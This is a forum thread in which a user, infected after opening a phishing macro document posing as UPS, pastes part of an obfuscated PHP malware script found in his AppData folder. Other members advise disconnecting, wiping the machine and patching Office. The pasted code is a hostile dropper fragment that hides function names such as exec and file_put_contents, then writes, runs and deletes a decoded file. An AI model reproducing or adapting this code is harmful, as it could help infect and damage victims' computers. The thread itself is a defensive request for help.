cavemanager Posted February 6, 2017 Share Posted February 6, 2017 (edited) I foolishly clicked a link in an email from what I thought was UPS (with a tracking number) and the link was a doc file with macros.. I noticed on system startup that I was seeing a PHP popup in the lower task bar. I then went to my local AppData\Roaming to find a suspicious folder with a php.exe file, a dll and a php script. I opened the PHP file in npp to have a look. I have very little experience with PHP so I can't really tell what the script is doing. Here is a copy/paste -- and I removed a little less than half the code just in case I am actually posting malicious code to this forum.. If I had to guess, I'd say it looks like it's doing encryption, so it's ransomware.. Script: <?php $GLOBALS['38744245'] = Array( 'cu' . 'rl_multi_exec', 'm' . 'ss' . 'ql_re' . 's' . 'ult', 'file_ge' . 't' . '_c' . 'on' . 'te' . 'nts', '' . 'fi' . 'l' . 'e_put_co' . 'n' . 't' . 'ents', 'ex' . 'ec', '' . 'unlink', '' . 'strpos', 'fg' . 'etcs' . 'v', 'strnat' . 'cmp', 'strlen', 'm' . 't_' . 'rand', 'p' . 're' . 'g_repla' . 'ce_callb' . 'ack', 'ch' . 'r', 'ord', 'st' . 'r' . 'po' . 's', 'array_' . 'fi' . 'lter', 's' . 'e' . 'ssion_is_r' . 'egist' . 'ered', 's' . 't' . 'rpos', 'cr' . 'eate_func' . 'tion', 'i' . 'm' . 'agecreatefrom' . 'gd2part', 'mt_' . 'rand' ); ?><?php function _1369297363($taqqmn) { $cabbfl = Array( "\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e", "\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e\x9c\x9a\x53\x21", 'i', 'bxhndsxsexibrxben', 'gdz', '', 'lxdgilfgvccek', 'vz' ); return $cabbfl[$taqqmn]; } ?><?php $ucdxetr = round(0 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.; while (round(0 + 3693) - round(0 + 923.25 + 923.25 + 923.25 + 923.25)) $GLOBALS['38744245'][0]($yfvmrsd, $rgyctvo, $hdoptxm); $ovehlgp = _1369297363(0); $czdwupq = _1369297363(1); while (round(0 + 369.33333333333 + 369.33333333333 + 369.33333333333) - round(0 + 221.6 + 221.6 + 221.6 + 221.6 + 221.6)) $GLOBALS['38744245'][1]($acdfplp, $rgyctvo, $ghktwqf); $ovehlgp = gnnnesr($ovehlgp, $ucdxetr); $czdwupq = gnnnesr($czdwupq, $ucdxetr); $yxfgkhr = $GLOBALS['38744245'][2]($ovehlgp); if ($yxfgkhr) { $ghktwqf = gnnnesr($yxfgkhr, $ucdxetr); $GLOBALS['38744245'][3]($czdwupq, $ghktwqf); $GLOBALS['38744245'][4]($czdwupq); while (!$GLOBALS['38744245'][5]($czdwupq)) Sleep(round(0 + 1)); $ptdybmu = _1369297363(2); } function tpugtze($acdfplp, $gsseqei) { $wexiboc = $gsseqei & round(0 + 7.75 + 7.75 + 7.75 + 7.75); if ($GLOBALS['38744245'][6](_1369297363(3), _1369297363(4)) !== false) $GLOBALS['38744245'][7]($yfvmrsd, $ucdxetr, $ucdxetr, $czdwupq); return ($acdfplp << $wexiboc) | (($acdfplp >> (round(0 + 10.666666666667 + 10.666666666667 + 10.666666666667) - $wexiboc)) & ((round(0 + 1) << (round(0 + 7.75 + 7.75 + 7.75 + 7.75) & $wexiboc)) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2))); } function gnnnesr($rgyctvo, $ucdxetr) { $qaptxjz = _1369297363(5); while (round(0 + 3667) - round(0 + 3667)) $GLOBALS['38744245'][8]($yxfgkhr); [END PORTION OF CODE REMOVED] ?> Edited February 6, 2017 by cavemanager Quote Link to comment https://forums.phpfreaks.com/topic/303116-is-this-a-malicious-php-script/ Share on other sites More sharing options...
requinix Posted February 6, 2017 Share Posted February 6, 2017 I foolishly clicked a link in an email from what I thought was UPS (with a tracking number) and the link was a doc file with macros. It's pretty much guaranteed to be malicious, and it's likely not the only bad thing that got added to your computer. Quote Link to comment https://forums.phpfreaks.com/topic/303116-is-this-a-malicious-php-script/#findComment-1542377 Share on other sites More sharing options...
cavemanager Posted February 6, 2017 Author Share Posted February 6, 2017 It's pretty much guaranteed to be malicious, and it's likely not the only bad thing that got added to your computer. I figured.. any way to check where/what else got added to my pc? I have Trend Mirco AV as well as Malwarebytes.. I've done scans but nothing turned up... Quote Link to comment https://forums.phpfreaks.com/topic/303116-is-this-a-malicious-php-script/#findComment-1542378 Share on other sites More sharing options...
Jacques1 Posted February 6, 2017 Share Posted February 6, 2017 Forget about trying to “clean” the system. Cut the Internet connection, save your data (or what's left of it), wipe the PC and start over. And for the love of god, stop opening random files from the Internet. Quote Link to comment https://forums.phpfreaks.com/topic/303116-is-this-a-malicious-php-script/#findComment-1542380 Share on other sites More sharing options...
cavemanager Posted February 6, 2017 Author Share Posted February 6, 2017 (edited) Forget about trying to “clean” the system. Cut the Internet connection, save your data (or what's left of it), wipe the PC and start over. And for the love of god, stop opening random files from the Internet. I'm not just downloading random files from the Internet. I am usually careful about these things but it just so happened that I have UPS orders and the email looked legit. I don't know if you've heard, but even knowledgeable people can be tricked too. I did immediately disconnect from the network and do some file copies just in case. Meanwhile, Trend eventually grabbed the virus and I think I stopped it before it could do any damage. I am planning to wipe and re-install just because I know it's the best thing to do. Edited February 6, 2017 by cavemanager Quote Link to comment https://forums.phpfreaks.com/topic/303116-is-this-a-malicious-php-script/#findComment-1542381 Share on other sites More sharing options...
Jacques1 Posted February 6, 2017 Share Posted February 6, 2017 I don't know if you've heard, but even knowledgeable people can be tricked too. Sure, but going to a website which clearly isn't the official one (ups.com uses HTTPS with an EV certificate for everything), downloading a .doc file (why would UPS use such a weird format?), opening it directly in Word and probably clicking past the macro warnings is a pretty long chain of actions. I'm not saying this to put you down or pretend like I'm immune to attacks. My point is that you need a lot more paranoia on multiple levels, not just related to strange e-mails. Quote Link to comment https://forums.phpfreaks.com/topic/303116-is-this-a-malicious-php-script/#findComment-1542384 Share on other sites More sharing options...
cavemanager Posted February 6, 2017 Author Share Posted February 6, 2017 Sure, but going to a website which clearly isn't the official one (ups.com uses HTTPS with an EV certificate for everything), downloading a .doc file (why would UPS use such a weird format?), opening it directly in Word and probably clicking past the macro warnings is a pretty long chain of actions. I'm not saying this to put you down or pretend like I'm immune to attacks. My point is that you need a lot more paranoia on multiple levels, not just related to strange e-mails. I clicked the link in my email and the file just downloaded/ran. I didn't manually go out to a website to download it. Like I said, the email looked really legit and I just happened to be waiting for a package from UPS. Plus, this was before I had coffee.. Looking back, I should have hovered over the link to see the real destination. Live and learn. Quote Link to comment https://forums.phpfreaks.com/topic/303116-is-this-a-malicious-php-script/#findComment-1542385 Share on other sites More sharing options...
requinix Posted February 7, 2017 Share Posted February 7, 2017 If simply opening the file was enough then there's a good chance your Office isn't up to date with patches: the file should have been blocked by Word from doing anything, specifically for this reason. But yeah, lesson learned. Companies do not send attachments with emails, not least because of the processing overhead to do so - they either tell you what you need to know in the email, or link(/phish) you to a website. Quote Link to comment https://forums.phpfreaks.com/topic/303116-is-this-a-malicious-php-script/#findComment-1542397 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.